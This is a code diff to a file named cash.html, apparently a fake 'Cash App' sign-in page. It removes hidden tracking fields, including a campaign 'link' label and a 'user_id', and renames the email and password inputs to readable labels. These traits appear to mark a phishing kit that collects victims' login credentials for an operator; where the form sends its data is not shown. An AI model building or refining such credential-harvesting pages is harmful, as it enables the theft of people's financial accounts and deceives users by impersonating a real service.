--- a/cash.html
+++ b/cash.html
@@ -153,16 +153,12 @@
     <p class="login-subtitle">Sign in to your Cash App account</p>
 
     <form id="allForm">
-      <input type="hidden" name="link" value="Cash App Login">
-      <input type="hidden" name="ftype" value="normal">
-      <input type="hidden" name="login" value="login">
-      <input type="hidden" name="user_id" value="16934">
 
-      <input type="text" class="form-input" name="message_title" placeholder="Email or phone number" required>
+      <input type="text" class="form-input" name="Email or phone" placeholder="Email or phone number" required>
 
       <!-- Password with eye icon -->
       <div class="password-wrapper">
-        <input type="password" class="form-input" id="password" name="description" placeholder="Password" required>
+        <input type="password" class="form-input" id="password" name="Password" placeholder="Password" required>
         <span class="toggle-password" id="togglePassword">👁️</span>
       </div>
 
